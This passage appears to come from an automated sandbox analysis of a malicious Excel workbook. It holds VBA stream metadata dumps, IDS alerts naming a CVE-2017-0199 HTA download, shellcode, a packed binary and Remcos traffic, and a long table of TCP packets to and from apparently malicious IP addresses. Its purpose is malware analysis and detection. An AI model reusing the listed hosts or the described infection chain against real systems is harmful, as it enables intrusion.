                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:523
                Entropy:5.242959383129243
                Base64 Encoded:True
                Data ASCII:I D = " { 4 9 6 7 3 D F A - E C 5 0 - 4 F D 1 - B 6 7 0 - C F 2 7 1 8 8 A 2 0 1 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 7 6 7 E 7 A 7 E 7 A 7 E 7
                Data Raw:49 44 3d 22 7b 34 39 36 37 33 44 46 41 2d 45 43 35 30 2d 34 46 44 31 2d 42 36 37 30 2d 43 46 32 37 31 38 38 41 32 30 31 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:3.9991265979317787
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.381128031743399
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 cb 7a b3 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                2024-07-26T09:29:59.517525+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl4916680192.168.2.2291.92.245.100
                2024-07-26T09:30:09.356706+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:09.273433+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:09.273485+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:09.273537+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:29:59.517585+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)804916691.92.245.100192.168.2.22
                2024-07-26T09:29:57.196366+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl4916480192.168.2.2291.92.245.100
                2024-07-26T09:29:57.196370+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)804916491.92.245.100192.168.2.22
                2024-07-26T09:30:09.273467+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:08.658935+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:09.544003+0200TCP2009080ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:16.371974+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection491682558192.168.2.2223.95.60.82
                2024-07-26T09:30:20.216815+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4916980192.168.2.22178.237.33.50
                2024-07-26T09:30:09.273374+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22
                2024-07-26T09:30:09.356737+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected8049167107.173.143.46192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 09:29:55.028450966 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:55.033349037 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:55.033447027 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:55.033576965 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:55.038393021 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:56.272893906 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:56.272974968 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:56.284629107 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:56.289411068 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:56.289494991 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:56.293190002 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:56.297970057 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196281910 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196291924 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196296930 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196366072 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.196369886 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196382999 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196400881 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196409941 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196418047 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.196422100 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196433067 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196439981 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.196449995 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.196465969 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.196496010 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.201488972 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.201514006 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.201536894 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.201554060 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.283590078 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.283616066 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.283632994 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.283649921 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.283691883 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.283719063 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.288568974 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.288592100 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.288608074 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.288624048 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.288644075 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.288672924 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.288672924 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.293411970 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.293432951 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.293448925 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.293464899 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.293478966 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.293483973 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.293498039 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.293519020 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.298216105 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.298238993 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.298255920 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.298270941 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.298280001 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.298293114 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.298321009 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.303003073 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.303029060 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.303044081 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.303059101 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.303075075 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.303093910 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.303107977 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.354244947 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.369920969 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.369957924 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.369973898 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.370001078 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.370001078 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.370021105 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456037045 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456069946 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456085920 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456100941 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456118107 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456155062 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456353903 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456378937 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456382990 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456394911 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456402063 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456410885 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456419945 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456424952 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.456438065 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.456454039 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532093048 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532110929 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532134056 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532147884 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532162905 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532243013 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532550097 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532565117 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532579899 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532582045 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532582998 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532593966 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.532604933 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532618999 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.532634020 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.608983040 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609002113 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609018087 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609052896 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609071970 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609083891 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609098911 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609122992 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609137058 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609500885 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609524965 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609539986 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609554052 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.609565973 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609577894 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.609594107 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.726129055 CEST4916580192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:57.731096029 CEST8049165188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:57.731204033 CEST4916580192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:57.731762886 CEST4916580192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:57.733649969 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.733689070 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:57.736963034 CEST8049165188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:57.741626024 CEST804916491.92.245.100192.168.2.22
                Jul 26, 2024 09:29:57.741694927 CEST4916480192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:58.860368013 CEST8049165188.114.96.3192.168.2.22
                Jul 26, 2024 09:29:58.860523939 CEST4916580192.168.2.22188.114.96.3
                Jul 26, 2024 09:29:58.875215054 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:58.880412102 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:58.880506992 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:58.880737066 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:58.885793924 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517443895 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517467022 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517477989 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517498970 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517513037 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517524004 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517524958 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517570019 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517570972 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517570972 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517585039 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517596960 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517606020 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517616034 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.517626047 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517646074 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.517653942 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.522723913 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.522757053 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.522768021 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.522799015 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.522799015 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.524138927 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613042116 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613054991 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613065004 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613138914 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613141060 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613152981 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613195896 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613234043 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613251925 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613264084 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613284111 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613296032 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.613352060 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613352060 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613352060 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613352060 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613352060 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.613481045 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616414070 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616425991 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616436958 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616446972 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616457939 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616467953 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616477966 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616477966 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616477966 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616508961 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616543055 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616648912 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616660118 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616671085 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616681099 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616681099 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616689920 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616694927 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.616718054 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616718054 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.616733074 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.673721075 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.673746109 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.673749924 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.673753977 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.673819065 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.674141884 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.747890949 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.747910023 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.748034954 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.774787903 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774807930 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774826050 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774837971 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774859905 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774868965 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.774883986 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.774930954 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.774930954 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.775099039 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775114059 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775150061 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.775162935 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.775718927 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775732040 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775743961 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775755882 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.775778055 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.775791883 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.776298046 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.776352882 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.776392937 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.776434898 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:29:59.868321896 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:29:59.868386984 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004407883 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004439116 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004451036 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004462957 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004473925 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004513979 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004730940 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004767895 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004767895 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004767895 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004784107 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004811049 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004822969 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004853010 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004869938 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.004894972 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.004905939 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.005019903 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.005676031 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.005692959 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.005705118 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.005716085 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.005727053 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.005733013 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.005753994 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.005754948 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.006463051 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.006500959 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.006513119 CEST804916691.92.245.100192.168.2.22
                Jul 26, 2024 09:30:00.006521940 CEST4916680192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:00.006534100 CEST804916691.92.245.100192.168.2.22
